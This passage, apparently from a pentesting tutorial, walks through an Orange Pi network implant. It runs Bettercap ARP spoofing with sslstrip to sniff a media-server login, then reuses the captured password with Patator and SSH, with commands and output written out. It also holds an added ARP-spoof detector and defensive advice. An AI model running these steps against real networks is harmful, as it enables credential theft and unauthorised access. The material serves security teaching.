192.168.8.0/24 > 192.168.8.138 »
Then, fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are used to automate Bettercap commands and options.
10.#.#.#/24 > 10.#.#.## » caplets.update
[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...
Use caplets.show to view the installed caplets and their location on the operating system. You are encouraged to review the caplet files for brief descriptions of what each one does.
10.#.#.#/24 > 10.#.#.## » caplets.show
┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐
│ Name │ Path │ Size │
├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤
│ ap │ /usr/local/share/bettercap/caplets/ap.cap │ 307 B │
│ crypto-miner/crypto-miner │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn/download-autopwn │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │
│ fb-phish/fb-phish │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof/gitspoof │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/local/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack/hstshijack │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap │ 799 B │
│ http-req-dump/http-req-dump │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/local/share/bettercap/caplets/http-ui.cap │ 382 B │
│ https-ui │ /usr/local/share/bettercap/caplets/https-ui.cap │ 661 B │
│ jsinject/jsinject │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/local/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │
│ mana │ /usr/local/share/bettercap/caplets/mana.cap │ 61 B │
│ massdeauth │ /usr/local/share/bettercap/caplets/massdeauth.cap │ 302 B │
│ mitm6 │ /usr/local/share/bettercap/caplets/mitm6.cap │ 551 B │
│ netmon │ /usr/local/share/bettercap/caplets/netmon.cap │ 42 B │
│ pita │ /usr/local/share/bettercap/caplets/pita.cap │ 900 B │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │
│ rogue-mysql-server │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │
│ rtfm/rtfm │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │
│ simple-passwords-sniffer │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │
│ tcp-req-dump/tcp-req-dump │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │
│ web-override/web-override │ /usr/local/share/bettercap/caplets/web-override/web-override.cap │ 254 B │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘
To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.
10.#.#.#/24 > 10.#.#.## » include netmon
┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0 │ │ 0 B │ 0 B │ 21:18:37 │
│ 192.168.8.1 │ XX:XX:XX:XX:XX:XX │ gateway │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│ │ │ │ │ │ │ │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │ │ Sony Corporation │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10 │ │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘
↑ 54 kB / ↓ 433 kB / 4310 pkts
Alternatively, traffic passing between devices on the network can be sniffed by running the following six commands in order.
10.#.#.#/24 > 10.#.#.## » set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.## » set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.## » set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.## » net.sniff on
10.#.#.#/24 > 10.#.#.## » http.proxy on
10.#.#.#/24 > 10.#.#.## » arp.spoof on
Bettercap will begin to display a large amount of data passing over the network. In some cases, there may be servers and services on the network that don't support HTTPS, or don't use it by default. These are prime targets for tools like Bettercap.
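What arp.spoof does on the wire is announce the implant's MAC as the owner of the gateway's IP, and with arp.spoof.internal set, of the other hosts' IPs too. That is exactly what a passive ARP monitor on the same LAN can catch. The following is an added example (not code from the article or from Bettercap) of such a monitor replayed over a constructed sequence of ARP replies; the MAC addresses are made up, since the article redacts the real ones, and the pinned gateway mapping is an assumed administrator setting.

```python
from collections import defaultdict

# Constructed ARP replies (seconds, sender IP, sender MAC) as a passive
# sniffer on the LAN would see them before and after `arp.spoof on` with
# arp.spoof.internal set to true, as in the Bettercap session above.
# The MACs are made up; the article redacts the real ones.
GW_MAC = "02:00:00:00:08:01"       # the router at 192.168.8.1
SONY_MAC = "02:00:00:00:08:79"
WIN_MAC = "02:00:00:00:08:93"
IMPLANT_MAC = "02:00:00:00:08:38"  # eth0 of the Orange Pi Zero at .138

SAMPLE_ARP_REPLIES = [
    (0, "192.168.8.1", GW_MAC),
    (1, "192.168.8.179", SONY_MAC),
    (2, "192.168.8.193", WIN_MAC),
    (3, "192.168.8.138", IMPLANT_MAC),   # the implant answering for its own IP: normal
    (10, "192.168.8.1", IMPLANT_MAC),    # the gateway's IP is now claimed by the implant
    (11, "192.168.8.179", IMPLANT_MAC),  # internal spoofing: the victims' IPs are claimed too
    (12, "192.168.8.193", IMPLANT_MAC),
]


class ArpSpoofMonitor:
    """Passive detector for ARP cache poisoning.

    pinned maps IPs to the MACs the administrator knows to be correct (at least
    the gateway). Three signals are raised:
      pinned_mismatch          a pinned IP is claimed by some other MAC (high confidence)
      mac_changed              an IP moves to a new MAC (lower confidence: DHCP can
                               legitimately hand an address to another device)
      mac_claims_multiple_ips  one MAC answers for several IPs, which is what
                               arp.spoof.internal looks like on the wire
    """

    def __init__(self, pinned=None):
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.ip_to_mac = {}                 # last MAC seen for each IP
        self.mac_to_ips = defaultdict(set)  # every IP each MAC has claimed

    def observe(self, ts, ip, mac):
        """Feed one sender IP/MAC pair from an ARP reply; return the new alerts."""
        mac = mac.lower()
        alerts = []
        if ip in self.pinned and mac != self.pinned[ip]:
            alerts.append({"ts": ts, "kind": "pinned_mismatch", "ip": ip,
                           "expected": self.pinned[ip], "seen": mac})
        elif ip in self.ip_to_mac and self.ip_to_mac[ip] != mac:
            alerts.append({"ts": ts, "kind": "mac_changed", "ip": ip,
                           "expected": self.ip_to_mac[ip], "seen": mac})
        self.ip_to_mac[ip] = mac
        claimed = self.mac_to_ips[mac]
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:
                alerts.append({"ts": ts, "kind": "mac_claims_multiple_ips",
                               "mac": mac, "ips": sorted(claimed)})
        return alerts

    def run(self, replies):
        """Replay a list of (ts, ip, mac) tuples and collect every alert."""
        return [a for ts, ip, mac in replies for a in self.observe(ts, ip, mac)]


if __name__ == "__main__":
    # Live use would feed (time.time(), pkt[ARP].psrc, pkt[ARP].hwsrc) for each
    # ARP is-at packet (op == 2) captured with scapy's sniff(filter="arp").
    monitor = ArpSpoofMonitor(pinned={"192.168.8.1": GW_MAC})
    for alert in monitor.run(SAMPLE_ARP_REPLIES):
        print(alert)
```

Note that the four baseline replies raise nothing; every alert comes from the replies at 10 seconds and later, and the multiple-IP signal alone is enough to single out the implant's MAC.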
Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.
POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5
{
"Username": "tokyoneon",
"Pw": "secure_password-321"
}
Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.
root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1
INFO - code size time | candidate | num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0 39 0.117 | | 1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s
The Patator request didn't return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack.
root@orangepizero:/opt/patator# cd
root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183
The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1
tokyoneon@ubuntu:~$
How to Protect Yourself Against Network Implant Attacks
- Enable HTTPS: The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way toward thwarting an attacker's ability to compromise the network further.
- Use Password Managers: The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems.
- Disable DHCP: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet, which would hinder the attacker's ability to access the network remotely. Disabling DHCP only creates an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.
- Be Alert: Be mindful of the people and devices authenticated to the router you're connecting to. It also doesn't hurt to inspect devices physically attached to the router occasionally. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries. Public networks like these are prime targets for hackers looking to compromise as many people and services as possible.
Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.
Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.
Cover photo by tokyoneon/Null Byte